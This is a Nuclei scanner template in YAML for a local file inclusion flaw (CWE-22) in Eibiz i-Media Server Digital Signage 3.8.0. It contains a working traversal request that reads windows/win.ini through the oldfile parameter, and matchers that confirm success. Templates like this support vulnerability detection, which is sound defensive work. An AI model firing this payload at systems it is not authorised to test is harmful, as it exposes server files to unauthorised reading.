33 lines
1.2 KiB
YAML
33 lines
1.2 KiB
YAML
id: eibiz-lfi
|
|
|
|
info:
|
|
name: Eibiz i-Media Server Digital Signage 3.8.0 - Local File Inclusion
|
|
author: 0x_akoko
|
|
severity: high
|
|
description: Eibiz i-Media Server Digital Signage 3.8.0 is vulnerable to local file inclusion. An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: lfi,eibiz,packetstorm,windows
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null"
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
# digest: 4b0a004830460221009065dd6a3e2e2eb2a797a50b890d5b8f9e1d6d425ce09a721a1da79b4b9cf77b022100b4837771e84b76008ab5084aa8a72b3065f57c1e23baada46c5b4431e8e86b20:922c64590222798bb761d5b6d8e72950
|